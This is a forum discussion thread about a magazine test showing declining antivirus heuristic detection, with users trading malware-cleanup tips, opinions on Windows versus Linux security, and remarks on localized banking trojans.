Anti-Virus Effectiveness Down from Last Year

juct sends us Heise Security's summary of an article detailing the abilities of 17 current anti-virus solutions. German computer magazine c't has found that, compared to last year, the virus scanners are having a more difficult time recognizing malware. Quoting Heise: "For real protection, however, in view of the flood of new malware, the way these programs cope with new and completely unfamiliar attacks is more important. And that's where almost all of the products performed significantly worse than just a year ago. The typical recognition rates of their heuristics fell from approximately 40-50 per cent in the last test - at the beginning of 2007 - to a pitiful 20-30 per cent."

yeah, but..

[xubu_caapn]

do they run on Linux?

Re:yeah, but..

[_merlin]

Considering how few viruses run on Linux, it's not as big a deal for Linux users. However, Linux machines that deliver content to Windows users (mail servers, usenet servers, bulletin boards, etc.) are a useful application for Linux virus scanners that detect viruses for other platforms. And the big names do function in this role: Kaspersky and AVG both have products for doing just this. And there's the free ClamAV as well, of course. The Linux versions of the big name products are probably no more or less effective than the Windows versions.

Re:yeah, but..

[allcar]

You make an excellent point.
Pro Linux, as I am, I still do not feel that we can afford to be complacent about the malware issue. The reason that Linux is largely unaffected is that it is not very widely used, especially by the sort of numpties that get tempted by exciting new screensavers baring trojans.
If/when we succeed in bringing Linux to the masses, this layer of protection will be torn away. I hope and believe that Linux is more secure by design and the same is probably true of many of the apps that are popular in Linux distros - you won't find ActiveX cheerfully opeing the door to anyone. However nobody should be ignoring malware with the excuse that Linux is immune.

Re:yeah, but..

[stirz]

If you run many windows-applications under linux via wine, the (windows-)virus threat surely matters. As you usually don't launch wine as root, $malware will only have limited system access, but write access for a wine-run virus on /home/$user can a real pain in the ass :-)

Re:yeah, but..

[FudRucker]

i agree, windows is such as vulnerable & fragile mess i refuse to use it anymore, continuing to use windows knowing this is about like refusing to get off the railroad tracks knowing a freight train is coming to run you over...

Re:yeah, but..

[ccs.gott]

You make an excellent point.
Pro Linux, as I am, I still do not feel that we can afford to be complacent about the malware issue. The reason that Linux is largely unaffected is that it is not very widely used, especially by the sort of numpties that get tempted by exciting new screensavers baring trojans.
If/when we succeed in bringing Linux to the masses, this layer of protection will be torn away. I hope and believe that Linux is more secure by design and the same is probably true of many of the apps that are popular in Linux distros - you won't find ActiveX cheerfully opeing the door to anyone. However nobody should be ignoring malware with the excuse that Linux is immune.

The reason linux is largely unaffected is because it was designed better than its unworking counterpart. Weather or not it is installed on more machines matters not, as the default user does not have administrator privileges (root) while M$ does.

Re:yeah, but..

[seandiggity]

Let's not forget ClamWin, which will give ClamAV protection to Windows machines. The only real criticism I've seen is that it doesn't have a real-time scanner, but supposedly one is in the works. As it stands now, you can pair it with WinPooch for real-time scanning.

Re:yeah, but..

[SCHecklerX]

Um. Many mail gateways are linux boxes. That is the place you should be scanning your incoming mail for stuff that your non-clueful users will gleefully run on their windows boxes. See mimedefang.

Re:yeah, but..

[xubu_caapn]

haha, i was worried when i saw +2, Insightful. i'm glad i got what i deserved.

Re:yeah, but..

[skeeto]

The reason that Linux is largely unaffected is that it is not very widely used .. If/when we succeed in bringing Linux to the masses, this layer of protection will be torn away

I would argue that this is another reason to make new users are aware of software freedom. Why would they go grab that suspicious screensaver when they might look at it and say "this is not free software, so I have no use for it."? With a system like Debian GNU/Linux, if they want screensavers, its just a simple sudo apt-get install xscreensavers (or whatever the package would be). The repository packages are signed and are as safe as far as you trust the Debian maintainers (the repository mirror can be untrusted).

smitFraud

[Freaky+Spook]

I've had a lot of people bring me infected PC's with smitFraud, that the big AV's have not even recognised or been able to properly remove, they have been pretty angry that the $90 or so they paid for a complete Internet Security product was not able to protect them.

It causes windows to pretty much choak and die as it just consumes so many resources and provides so much irritation, but major products like Trend or Symantec have not been able to successfully protect or remove them, I have had to use custom written tools that you get off the net for free. They really dropped the ball with that one.

Re:smitFraud

[yoyhed]

I know - you'd think they'd have figured it out by now since it's so easy for someone like you or me to identify it with a cursory look at the machine - although SmitFraudFix in safe mode works fine, you're right about the angry customer thing.

Re:smitFraud

[lukesky321]

Funny you mention this. I was fixing some guys computer today and it was infected with smitFraud. Holy cow, I looked at how much memory was being used used and only 10 mb of ram was free. I ended up booting into safe-mode and removing it with smitFraud which dare I say works miracles. He had McAffe which didn't do shit.

Re:smitFraud

[Barny]

Been getting this one a lot, the fix is usually fine for older varients but new versions and revisions spring up that it just seems to miss. The system seems clean at first, but usually about a month later it is all back.

I usually tell customers this, and tell them they have two choices:
1 we can try smittfraud fix and who knows, it might be lucky, but if they have to bring it back in a month we will charge them again.
2 we can backup all their data, format, reinstall and remove any executable files from their backup.

The second always works, have never had a re-infection (well, have, but that is usually thanks to someone surfing porn regularly, proven to the customer by showing them the browse history) with it.

Best protection for it, firefox + no-script, which I tell the customer and offer to install for no extra cost of course :)

Only problem is, my boss kinda hates me, we don't get the same people bringing their machines in every 2 months anymore needing a software clean done :P

Re:smitFraud

That's because you are providing a cure. Your boss wants you to provide a treatment.

Re:smitFraud

[Ephemeriis]

I don't think I've seen a computer with a traditional virus infection in months now. They're all coming in with that smit crap - and you're right, commercial antivirus doesn't pick it up at all.

The diagnosis is quick and obvious, the machine literally screams at you that it's infected. The disinfection tools are readily available, quick and effective. All things considered it's relatively painless to disinfect one of these machines.

But I'm really surprised that commercial antivirus software isn't picking this stuff up. I've had quite a few unhappy customers wondering what their commercial antivirus was actually protecting them from.

Re:smitFraud

[gardyloo]

Kaspersky (which I really like, but I may switch to avast! once my Kas license runs out) has a website from mid-2005 mentioning perhaps the first waves of the smitFraud infections. It (http://www.viruslist.com/en/weblog?calendar=2005-07) claims It seems that all (recent) Smitfraud variants have one thing in common: They all try to persuade the user to download PSGuard, a program which claims to remove the spyware (i.e. Smitfraud) which has been installed onto the system.

Naturally the program only disinfects the infection once the user has paid for it.

Although PSGuard is questionable in terms of motive, the program itself has no malicious payload whatsoever. This means we can't simply add detection for it to our databases.

      Is this still the way it works?

Re:smitFraud

[UnknownSoldier]

Hey, thx for mentioning smitfraudfix! I wasn't aware of that tool! Gonna give this a try.

One of the kids machine has something that keeps starting up the web browser (Firefox!) that I can't for the life of me figure out what is causing it. Tried the usual Adaware, SpyBot Search-n-Destroy, ClamWin, Hijack This, and even booting into safe-mode, but nothing detects it.

Anyone else have a list of the essential anti-spyware tools? (Preferably free)

Re:smitFraud

[yoyhed]

Your list looks good there, add in Spy Sweeper w/Antivirus if you can find the 15 day trial installer. For SFF, just boot into safe mode and run it and do option 2.

Re:smitFraud

[yoyhed]

Yeah, the "spyware removal" program doesn't seem to be malicious, but who knows what info it's sending back - I've seen PSGuard, and I've seen WinAntiVirus 2007 more recently as the program it tries to get you to buy...

after the ffact

[wizardforce]

I think the real problem with malware is that by the time an antivirus/antispyware program is needed IT IS TOO LATE. you have already been infected, antivirus software is for after the fact, cleaning up the files that were installed or warning you of their presence in a file atatchment etc.. The real defense here is preventing this from happening in the first place. That is, educating users not to click haphazerdly at anything that they feel like and that is a heck of a challenge. most users do not understand what can happen and many likely do not really care, they just want their new screensaver or whatever to work [bundled with spyware of course] and when their bad habits finally catch up with them when their computer slows to a virtual crawl, they go out and buy a new one thinking computers decay over time or something.

Re:after the ffact

[arotenbe]

The problem is that computers DO decay over time, or at least Windows systems do. Unless you reinstall Windows frequently (which, of course, the uneducated masses never do), most systems will grind to a halt in a few years from the accumulation of registry keys and can't-uninstall software, not to mention the 2-4 simultaneous "security" programs typical computers have installed. Viruses and spyware only help to put these computers out of their misery.

Re:after the ffact

[wizardforce]

most systems will grind to a halt in a few years from the accumulation of registry keys and can't-uninstall software

yes, eventually thi is true but malware does a fine job of speeding up the process by a good 10 fold or more. winboxes will work for a pretty long time if they are not constantly installing and uninstalling software- the old compaq still has win95 on it and works fine- it just wasn't constantly burdened by a bunch of garbage accumulating over time. if a winbox like that is taken care of it can last well over a decade quite nicely. if it isn't well... there's always upgrading to one of the penguins :)

Re:after the ffact

[RAMMS+EIN]

``The real defense here is preventing this from happening in the first place.''

Yes.

``That is, educating users not to click haphazerdly at anything that they feel like''

No.

Because, as you yourself point out,

``and that is a heck of a challenge. most users do not understand what can happen and many likely do not really care'' ...and they shouldn't have to. You open these attachments (etc.) because you think they will do something good. You don't expect them to mess up your computer. Without support from the operating system and other legit software on the computer, attachments _couldn't_ mess up your computer. The only reason they can is that the software people use to open them is insecure. It allows (through design, sloppiness, or bugs) arbitrary code execution where all it _should_ allow is viewing images and perhaps movies and sound. Proper sandboxing and safe code (which is easy to write in all but a handful of commonly used programming languages) will solve this problem.

As an example of the above, I am working on a programming language, and one thing this programming language will feature is different subsets for different niches. One such subset will allow any program to be written, so long as it doesn't change the state of anything outside the program that was not passed into it as a modifiable data structure. That means no interaction with any files on your system, no popup windows, no phoning home, no sending spam, etc. If you give it a file to read and an area of the screen to draw on, these are the only things it will be able to do.

Re:after the ffact

[Tim+C]

Oh rubbish. In more than a decade of Windows PC ownership and use I've not had a single machine grind to a halt in this manner. The machine I'm typing this on now I've had for 3+ years without ever reinstalling it.

I'm not saying that it can't happen, but it most definitely is not inevitable.

Re:after the ffact

[Suddenly_Dead]

I think the real problem with malware is that by the time an antivirus/antispyware program is needed IT IS TOO LATE. you have already been infected, antivirus software is for after the fact, cleaning up the files that were installed or warning you of their presence in a file atatchment etc

There's this not-too-recent development in Antivirus programs where they actually scan executables before and as you execute them, preventing the infection.

Of course it's not perfect, but it's probably the reason most people have virus scanners. Once a system is infected it's useless to most users who will simply bring it into a shop or trash it because "it's too slow", and even many experienced users would simply give up a reinstall Windows at that point.

Re:after the ffact

[Ajehals]

You are right, a well managed Windows environment can be perfectly stable for long periods (assuming you carry out the usual maintenance tasks as required). The problem is that well managed generally means that you are not installing little bits of software whenever the need strikes you, you don't grab a copy of Windows Weekly with £500 worth of free ware, trial ware and demo's every other week and install them all and then remove most of them again. Most people (tm) do, and as such most windows installs degrade over time, and therefore for most people it *is* inevitable, but a consequence of usage not the OS itself*.

*Saying that I don't think I have ever seen a Linux box suffer in this way even after it has had X thousands of applications installed and removed, I have no clue about how OSX or Apple OS's fare but I havent heard any complaints...

Re:after the ffact

[kvezach]

As an example of the above, I am working on a programming language, and one thing this programming language will feature is different subsets for different niches. One such subset will allow any program to be written, so long as it doesn't change the state of anything outside the program that was not passed into it as a modifiable data structure.

That sounds a lot like capabilities, which is a very good idea. It's just too bad none of the larger OSes support them by default, which means we're stuck with having to add compartmentalization explicitly.

Re:after the ffact

[Opportunist]

Well, it doesn't have to be that way. One could argue that if you install software bundled with questionable drivers (aka "copy protection mechanisms"), with strange install and uninstall routines (staple with certain "freeware", that would be more correctly be labeled adware) or from questionable sources, you're prone to ending up with software that doesn't cooperate properly with your OS.

I don't even want to give MS the blame here. When you load your machine with drivers that hog more system resources than they should (and Securom for example is very well known for doing just that, especially when you happen to have a few different versions on your system), your system will degenerate.

Re:after the ffact

[Opportunist]

But that would have to be a feature of the OS, not the program. That your program "behaves" is nice, but that doesn't keep another program (i.e. malware) from being not nice.

Now, if the OS takes good care of security, a lot of things that can actually be a security risk or a feature won't be possible anymore. Certain tools require you to be able to tap into another processes memory or network traffic to be useful. Also, plugins and the like (the dreaded BHO security hole in IE, which is actually meant as a feature, and can be used as such) won't be possible.

That's a problem that won't go away. More security also means more limitation. For you, and for the programs you want to use. Now, of course one COULD implement decent security, but that would first of all require the OS to let you work and play with an account that doesn't need administrator privileges to work at all...

Re:after the ffact

As an example of the above, I am working on a programming language, and one thing this programming language will feature is different subsets for different niches. One such subset will allow any program to be written, so long as it doesn't change the state of anything outside the program that was not passed into it as a modifiable data structure. That means no interaction with any files on your system, no popup windows, no phoning home, no sending spam, etc. If you give it a file to read and an area of the screen to draw on, these are the only things it will be able to do.

Wait, you're working on Java and their applet security sandbox system? Wow, blast from the past. You think I could borrow your time machine for a while? I wouldn't mind visiting, say, 1920s New York. Or does it even let you go back to the past? Maybe all it can do is instantaneously transport you forward in time 17 years?

Re:after the ffact

[Opportunist]

Not-too-recent is good. That feature is a few decades old.

The problem is that you have to know a virus to detect it. Welcome to the arms race! That's why heuristics have been the way to go for a while now, because that way you can at least flag something as suspicious if you don't know it. But ... well, the drugs don't work anymore.

Re:after the ffact

[Tony+Hoyle]

The problem with that is badly implemented versions (*cough* Norton *cough*) that scan everything..executable or not, and slow the machine down so much that the cure is worse than the disease - I've had machine to sort out that have been using 80% of their cycles just scanning text files over and over again.

Re:after the ffact

[Opportunist]

Recently I got a lecture from my boss, telling me I should not say anything bad about competitors. So now my comment about Norton is usually "Their product comes in really good looking boxes".

While it makes sense to scan everything, not only PE32/64 executables (ya know, exploits and macros), it does NOT make sense to spend an evening scanning your correspondence. It is actually fairly easy to detect an exploit (they have to be done in very, very specific ways to work, obviously), and macro malware doesn't really play a terribly important role anymore today.

Re:after the ffact

[Ephemeriis]

I think the real problem with malware is that by the time an antivirus/antispyware program is needed IT IS TOO LATE. you have already been infected, antivirus software is for after the fact, cleaning up the files that were installed or warning you of their presence in a file atatchment etc.

Generally speaking, the antivirus that we sell and install is a preventative measure. Sure, educating users is the best way to go...but even then you've got mistakes and mis-clicks. And some folks just don't learn. Good antivirus scans executables and attachments as they're encountered and will block execution and warn you if it sees something suspicious. Good antivirus can actually protect you from getting infected even if you click on something you shouldn't. No, it isn't perfect, but it's another layer of protection.

Re:after the ffact

[snib]

I agree with you.... In fact I just posted here and asked this question:

If people would start making an effort to use common sense in web surfing, would the need for an anti-virus disappear? Or is more practical to run an imperfect, bogged-down piece of security software (that really doesn't work too well, judging by my survey of people's computers) so that people can surf without thinking?

Re:after the ffact

[kevingolding2001]

Dude, you left out the punchline!!

You were supposed to end with "$*%& [NO CARRIER]"

Re:after the ffact

[phantomcircuit]

It really is not that difficult to clean an infected system of virtually any payload.

1. Check all autorun entries using autoruns
2. Repeat step 1
3. If there are entires which had come back use process explorer to kill them
4. Should the processes be respawning each other (tag teaming) then proceed to the alternative method
5. Reboot
6. Delete files that where being added and probably find other similar looking crap and delete that too

Alternatively

1. Reboot in safe mode
2. Use autoruns
3. Delete crap

Really this is not that complicated unless a MBR payload is used.

Re:after the ffact

[dave562]

Really this is not that complicated unless a MBR payload is used.

Or until you get a .dll file that hooks LSASS or WINLOGON. I eventually used pendmove to delete the .dll but then the system hung when booting the OS. It was a Win2K box with out of date AV running IE 5.0 so I can't really hate on Microsoft for that one. If it had been up to date it wouldn't have been infected.

Re:after the ffact

[Sloppy]

If people would start making an effort to use common sense in web surfing, would the need for an anti-virus disappear? Or is more practical to run an imperfect, bogged-down piece of security software (that really doesn't work too well, judging by my survey of people's computers) so that people can surf without thinking?

Both approaches are wrong. The best approach is for network client applications (web browsers, email readers, and maybe even removable media filesystem mounters) to make usage not dangerous. Clicking a link or viewing a page, should never(*) run external code; it shouldn't even ask the user "would you like to infect your system?" Just don't execute stuff that came from outside. And downloading a file (or mounting removable media) should never cause the newly acquired file(s) to have executable permission. Executing foreign code should always result from an active step, where the administrator goes out of his way to allow execution/infiltration.

This is the normal state of affairs on some operating systems, and it's the biggest (by far) reason that Malware is uncommon on Unix-like systems.

(*) The only exception to the above, should be with code that is run in very weak environments where dangerous capabilities are not available. This means stuff should run either very restrictive sandboxes (e.g. run binaries as a "nobody" who has very little I/O permission -- certainly not filesystem access beyond perhaps some ramdisk that is dedicated to that process), or arguably in contexts where the code doesn't have much expressive power to begin with (e.g. javascript in a web browser).

And even these exceptions are hard to get right, so they should be approached with extreme caution. For example, web browsers should probably disable Javascript by default, and only have controls to explicitly enable it, on a website-by-website basis. Current versions of Firefox get this wrong and that's a shame, because I know that years ago, I saw some Mozilla derivatives that got it right.

Re:after the ffact

Unfortunately that does not fix the problem of some nasty things which attach themselves to or damage Windows .dll files.

Re:after the ffact

[snib]

> For example, web browsers should probably disable Javascript by default, and only have controls to explicitly enable it, on a website-by-website basis. Current versions of Firefox get this wrong and that's a shame, because I know that years ago, I saw some Mozilla derivatives that got it right.

I know a lot of people that share your opinion and use extensions such as NoScript...but personally I find it very annoying to have to enable JavaScript every time I find a site that needs it. JavaScript is used for menus, mouseover effects, cookies, sometimes even layout adjustments. I tried NoScript and found several pages that just looked like crap or were hard to use until I figured out that it's because they use JavaScript to help with the menus or layout.

I like what you're saying about safe browsers though...maybe if JavaScript simply didn't have the capabilities to access filesystem and ActiveX objects like it does, it would be a safer tool. I know CSS can be used for mouseover effects and all that, but most Internet users don't have a browser that supports modern CSS (*cough* IE *cough*). JavaScript is a much more universal approach, and it would be a shame to lose all the benefits of it just because of a bunch of additional crap that Microsoft and others have added on to the standard.

Re:after the ffact

[garisan]

Educating users to click or not to click is utopic. Still, one of the best and less used practices are regular backups. I have documents and data stuff in another partition, leaving C only for the operating system and installed applications. Scheduled daily incremental backups of whole partition with imaging software, and once a week a full backup deleting previous week. If I get infected,I restore yesterday's backup and in 15' I'm back in business without touching my personal data and stuff, much less time than running two or three AV to try to remove an unknown malware.

Re:after the ffact

[phantomcircuit]

hooking LSASS or WINLOGON means there is a registry setting involed which can easily be deleted. Stop the process or thread using Process Explorer Delete the Registry key Reboot Delete the file Reboot Magic

Re:after the ffact

[phantomcircuit]

Well if you have modified system binaries they will all show up in autoruns because if verifies signatures.

You'll then know to repair windows and possibly to delete all other executables on the system and reinstall all applications.

My expectations are not that high...

[RuBLed]

I always assume an antivirus is only as good as its current signatures. Heuristics are good but nowadays, I could literally count with my fingers the number of times it did the job. The best defense is still knowing what you are running with or without an antivirus. Most of the annoyances I see are done by the local script / virus kiddies, their work rarely make it outside the country so the signatures against those are not a priority. (Although what I hate is that most of this local scripts/virii are just copycats of popular ones, yet popular AV's rarely detects them...)

Re:My expectations are not that high...

[Opportunist]

That's maybe the most insightful I've read in this thread so far.

I work for an AV company. Our focus lies on "local threats". Not necessarily the local scriptkiddy community, more the phishing and ID fraud thing.

For about a year now, those things have been "localized". I'm not joking when I say that, depending on the country you're in, you get different versions of a certain trojan, targeting exactly YOUR banks, YOUR finance services, YOUR online stores. They actually go to the lengths of recreating the local bank pages down to the links. And then this malware is spread very, very well targeted on your country or state, or even only your county. They noticed that AV vendors do actually work together and something that spreads globally is easily detected within a second, not an hour later every AV vendor has a signature update that finds it.

With a very narrowly targeted release, you can stay "under the radar" and go undetected by most AV vendors who don't have any information gathering tools in that local area.

In short, don't buy the "best" AV tool. If there is one local company, buy theirs! They have the highest chance to find the local threats fastest, while still getting the global threats. Local threats, though, are the (IMO) more serious ones, not only making you a spam box or trashing your system, but they steal your ID, loot your account and destroy your credit rating!

Now, in turn I also get a fair deal of machines on my desk that have been affected by those ID problems (take a wild guess who's interested in finding out what's cooking). Most of those machines were not protected at all (or by Windows Defender, which is no protection. No MS bashing, but it can't be when you think about it), some were protected by global players in the AV field (most of them by a certain company with a capital N in their name), but none by local companies that DID actually find the threat.

You can test it yourself. Should you happen to get one of those targeted malware, send it to virustotal and look for yourself. Local companies will find it. Larger companies will find it much later, or not at all, because the spread is so tiny (thus the perceived threat so small) that it doesn't matter to them.

Re:My expectations are not that high...

[Thaelon]

If you don't want to be flamed or constantly corrected, stop spelling viruses, "virii". Besides it diminishes your credibility significantly.

Re:My expectations are not that high...

[Machtyn]

So, why don't the smaller companies share their knowledge with the bigger players (like you mention everyone does with the global infectors)? This is not meant as an accusatory question. Perhaps they do, but the larger companies ignore them... I don't know.

Re:My expectations are not that high...

[Opportunist]

They do. Actually, the cooperation between AV companies is remarkable and should definitly be considered exemplary for many other industries. Of course, basically it's done out of necessity rather than because we're all a happy family, but it's simply not economically feasible to build up a detection network that covers every single corner of the web.

The reason why it sometimes doesn't work out is that you're just a tiny company, finding "something". Something that doesn't affect 99% of the big player's user base. It simply has no priority. Not to mention that it's maybe not even something 'real' because only some small company in some corner of the planet considers it important.

It usually matters only in the case of very specifically targeted malware, maybe aimed at a bank in a single country or state. Malware targeting such a small community basically doesn't matter in the global picture. It does, of course, for a company doing mainly business in that local area.

Re:My expectations are not that high...

[dave562]

Or gives him old school points for keeping a pre-internet meme alive.

AV's???

[flakron]

when you have an AV you have viruses, no AV no viruses

Re:AV's???

[Tastecicles]

WHAT??

Enough said.

Re:AV's???

[flakron]

just a joke

Re:AV's???

[TheVelvetFlamebait]

That's true. I've uninstalled my AV software, and I haven't been notified once that my computer's infected. Plus it's cheaper too!

Re:AV's???

[Opportunist]

He's right. He's just right.

True story:

A customer call. Quite irate person, yelling and screaming at our poor techie, telling him in no uncertain terms that he finally uninstalled our piece of junk and installed $competitor_software, because our piece of electron crap kept popping up and nagging him with some "virus found" junk and cutting into his productivity while $competitor_software doesn't.

So. Now question for 500: What the heck do you tell him?

Re:AV's???

[Doctor-Optimal]

So. Now question for 500: What the heck do you tell him? "We regret the loss of your custom. Goodbye"

Re:AV's???

[Opportunist]

I am not supposed to lie to our customers.

Re:AV's???

Have a nice life, we don't need an idiot like you? *click* always worked for me anyway
As a side note, my captcha was privacy

A matter of principle

It's almost as if systems require genuine integrated security, rather than an anti-virus afterthought. Perish the thought.

running multiple antiviruses

[improfane]

No one company has the resources to be aware of every virus. The standard advice is to run more than one.

In Windows, if you wanna run more than one, you can only have the real time protection of a single anti-virus enabled or you get conflicts.

Meaning you rely on the on-demand protection of every other anti-virus and have to manually run them regularly OR set up schedules. What kind of user will do that?

Re:running multiple antiviruses

[allcar]

Even if you could run more than one in real time, on normal hardware, it would be insane. I am forced to use McAfee at work and the delay in opening even moderate sized files is really noticable. For large files, it's really intrusive. When a I make a large EAR file for deploying to an application server, it can take several minutes. Much of that delay is due to the AV. Performing a similar operation at home on comparable hardware running Linux without AV if much faster. If two virus checkers insisted on inspecting every file I accessed it would absolutely become necessary to upgrade the hardware. It's a sad fact that the hardware industry is being driven by bloatware and anti malware.

Re:running multiple antiviruses

[MrMr]

It's a sad fact that the hardware industry is being driven by bloatware and anti malware
You should look on the bright side: Since everybody has to buy high-end hardware, it also becomes much cheaper for people who need it for more interesting stuff.
(I would for instance very much like to see the next main-stream OS requiring 16 cores or more to run a simple email client on a desktop machine...)

Re:running multiple antiviruses

[Atario]

All too true. These AV programs need huge overhauls.

Re:running multiple antiviruses

[martin-boundary]

Nice theory. In practice though, you'll be using 15 cores just to draw fancy menus and bouncing icons. The 16th one will be shared between your app and the system sound effects manager.

User friendlyness is the worst idea since the mouse.

Re:running multiple antiviruses

[MrMr]

You miss my point: I wouldn't run a gui on such a 16-core desktop box.

Re:running multiple antiviruses

[brunde]

A windows program I'm remarkably happy using is Eset's NOD32 (or even it's Security Suite). Very little in terms of resource footprint and very fast. It gets pretty decent writeups too. Best I've found so far (and I've used quite a few - and beta tested more....)

Re:running multiple antiviruses

[jonbryce]

Not only that, but the two virus checkers would insist on scanning each other before letting the other scan the file, and probably before allowing each other to scan each other.

Re:running multiple antiviruses

[Opportunist]

Then you won't run Windows and won't need it in the first place.

Re:running multiple antiviruses

[martin-boundary]

You'd have to run a custom stripped down OS with only the processes you're sure you want running. That would rock. Of course, it could be _always_ cheaper to run a Beowulf cluster, eg when 16 processor desktop systems are standard, just get two 8 processor systems without the redundant monitors etc.

Re:running multiple antiviruses

[Tony+Hoyle]

The problem with nod32 is it interferes with the tcp/ip stack and stops lots of programs working.

What the hell it's doing even hooking into it is beyond me.. it's just feature creep.. it should be checking opened files only.

Re:running multiple antiviruses

[zrq]

I think that is what MrMr was getting at.

If the dominant desktop OS requires that amount of cpu power to run all the antivirus stuff and still get things done, then it will push down the price of multicore mega compute platforms. Those of us who choose to run an alternative OS that doesn't need all the extra antivirus stuff would still benefit from lower prices of multicore mega compute platforms and would be able to do more real work with them*.

Same sort of thing is happening with games. I don't play 3D games, but my desktop Linux desktop machine looks real nice with Compiz/Beryl and OpenGL running on a high powered graphics processor that would have been way out of my budget a few years ago. The push to get better and better 3D graphics in games has lowered the cost of the high powered graphics processors to the point where they become standard kit for our desktop machines.

* Ok, when I say 'real work', on most systems a lot of the extra compute power will be used to draw prettier 3D folding sliding bouncing windows in the UI. But having that amount of cheap compute power on servers will mean the boring nerds amongst us will be able to handle larger data sets and do more processing.

Just dont do it...

[Dishevel]

Just don't have AV's installed at all. Not having AV installed on my system keeps me from even thinking of trying anything stupid. every month or so I download a free trial of a Non Norton / Non Mcaffee AV program, update it and run a full scan. Then I do the same with a different one. Then I repeat with Spyware/malware programs. All that has ever been found is a few cookies. Safety through not doing stupid shit.

Re:Just dont do it...

[jimicus]

That might work for the average /.'er on a single PC on its own.

It doesn't work in an office full of people, and it doesn't work with the average /.'ers grandma.

Re:Just dont do it...

Too much like rock climbing with no safety line.

What happens when you want to examine that xxx.jpg.vbs file on your friend's ipod, but accidentally run it instead of opening it..? You're screwed and have to reinstall, while any decent antivirus package would have kept it from running.

Common sense is the first, best, line of defense, but putting all your eggs in one basket isn't such a great idea.

Re:Just dont do it...

[Opportunist]

Now, of course I have an ulterior motiv for saying that, but I wouldn't want to see what happens when the general population follows that advice (not only because it would most likely mean I have to find me a job where I actually have to work for my money).

You might not need an AV tool. You don't click every stupid button, open every attachment labeled "important info from your bank" or "last reminder", but you'd be amazed how many do.

Re:Just dont do it...

[Tony+Hoyle]

In an office full of people they won't have admin rights and the system policies would have locked down any ability to install anything.. so AV isn't an issue there either. All it'll do is slow them down and cause random BSODs, program failures etc.

Re:Just dont do it...

[zerocool^]

FREE ENTERPRISE-GRADE ANTIVIRUS SCAN

1.) go to Trend Micro's download page
2.) lower right side, click "Damage Cleanup Engine", and download sysclean.com:
"If you are not a Trend Micro customer please download the following file.
Sysclean Package 3.2MB
MD5 checksum: 4cb85b5a3c097fcb494dceed216b8d9e"
3.) go back to the download page, lower right side, click "Trend Micro pattern files"
4.) download the latest official or controled (beta) virus defs.
5.) stick these on a usb key, reboot in safe mode, copy to the desktop, place both files in the same folder, and run it.

Trend Micro's end user virus protection is not that great, it is bloated and annoying like most end user antivirus. But their enterprise product is SUPERB.

This, coupled with HijackThis (also now a Trend Micro product) and a good dose of Spybot and AdAware Personal will clean 99.9% of systems in safe mode, first time.

~Wx

Re:Just dont do it...

[Ephemeriis]

Just don't have AV's installed at all. Not having AV installed on my system keeps me from even thinking of trying anything stupid. every month or so I download a free trial of a Non Norton / Non Mcaffee AV program, update it and run a full scan. Then I do the same with a different one. Then I repeat with Spyware/malware programs. All that has ever been found is a few cookies. Safety through not doing stupid shit.

That works fine for cautious and educated users... But it relies on the user not being stupid, which cannot be assumed in all cases.

My wife and I do not run antivirus, and we're fine without it. I'll periodically download and run something free just to make sure we haven't picked up anything nasty - and as you said the worst I've ever seen is cookies and random adware. That does not work for my son though. Despite repeated warnings, disasters, punishment, and threats he will still click on something interesting looking that seems to be coming from one of his friends. For him I've had to set up a group policy that dramatically restricts what he can run (but I can't set him as a restricted user or else his games won't work) and we've got antivirus running constantly on his machine. It works relatively well, but I keep an image around just in case.

At work we generally install antivirus of some sort on every single machine. Once you've got more than one or two people on a network you really can't assume that they're all computer savvy. Someone's going to click something they shouldn't and you're going to need to keep the nastiness from spreading. Good group policies and restricted users go a long way to reduce the damage that someone can do...but decent antivirus is still important.

Re:Just dont do it...

[endlessoul]

I'm a proponent of "Safety through not doing stupid shit," but I still have some sort of AV/Antimalware/Etc. It just pays to be safe, even if you think you're sure that where you are going is clean.

My point is that average users don't know to do the things we do. They go on Myspace, they click on the spam emails, they click on the 'Urgent System Scan' craptastic popups. They simply don't know and most don't care to know the safe way to surf. They need an AV that works, which is the point of the article.

Re:Just dont do it...

Try this with him 'you broke it you FIX it, you dont fix it you dont use it'. You are cleaning up his mess. Once he figures out that he will have to deal with it the problem will go away. Show him virtual machines too if he MUST try something out...

Re:Just dont do it...

[Sloppy]

What happens when you want to examine that xxx.jpg.vbs file on your friend's ipod, but accidentally run it instead of opening it..?

How did you accidentally run it? The iPod should be mounted as noexec, so first you had to copy the file from that filesystem to your home directory. Then you had to chmod u+x your copy of the file. Then you had to execute it. Even the dumbest user can't accidentally do all three of those things.

You're screwed and have to reinstall

And to get to that level of screwedness, you had to to accidentally type su or sudo and a password, before you execute the malware. A fourth step, making the overall process even less likely to accidentally occur.

Of course, everything I'm saying, is based on a certain premise that we both know doesn't really apply in this case. So why are we pussy-footing around the real issue, by talking about user mistakes and virus scanners? We damn well know that the system was already compromised and design to aid potential malware, from the very beginning, before that specific xxx.jpg.vbs threat presented itself. And we know how to repair it.

The problem has been understood for many, many years. It has been solved. Those who willfully eschew the solution, shouldn't pretend that they're discussing solutions in good faith. The pretense is so transparent that it's comical.

Re:Just dont do it...

[sciencewhiz]

By the time you install an antivirus a month later, the rootkit you ran had already hidden everything deep enough that the antivirus won't find it.

The glass is half-empty?

An optimist would say that virus effectiveness has gone up.

Re:The glass is half-empty?

[Opportunist]

An Opportunist would say that heuristics are overrated and that he told you all so for years, and that he decided years ago already to move away from a dated way of detecting malware.

Mostly because the heuristics in his tool really sucked to begin with. :)

Re:The glass is half-empty?

[cp.tar]

So what would an Opportunist recommend?

Re:The glass is half-empty?

[Opportunist]

An Opportunist would most likely recommend the product of a company he works for. :)

Seriously now. This is akin to the question "What kind of computer do you suggest?" It depends on you, what you want to do with it, what your requirements are and in this case also where you live. As I've stated elsewhere, local companies are usually better at dealing with localized threats, which make up the majority of today's ID theft malware. Mostly because it makes no sense for the attackers to send malware targeting some bank in Sweden to Australian internet users. It only means you'll be more easily detected, because it increases the chance to hit a honeypot. There is also a good chance that they have good connections to local finance services (financial services usually don't really want to take their problems abroad and risk bad press when too many people know about it), meaning that even if something escapes their eyes initially, they will get a heads-up from that angle.

What I would recommend is to take a look at AV companies around your area. Often the local ones are also the better ones for home users, for three reasons. They usually don't have large corporations as their main clients (i.e. making you and your copy insignificant, and making false positives in copy protections of games a non-issue because their corporate clients actually either don't care or outright want games to be found as malware), they react better to local threats and most of all they are usually also much faster to react to changes, simply due to their (normally) smaller size. And changes happen fast in this industry. What was state of the art half a year ago is obsolete today.

Re:The glass is half-empty?

[cp.tar]

Well, you'd specifically mentioned you recommended other things, so I was curious...

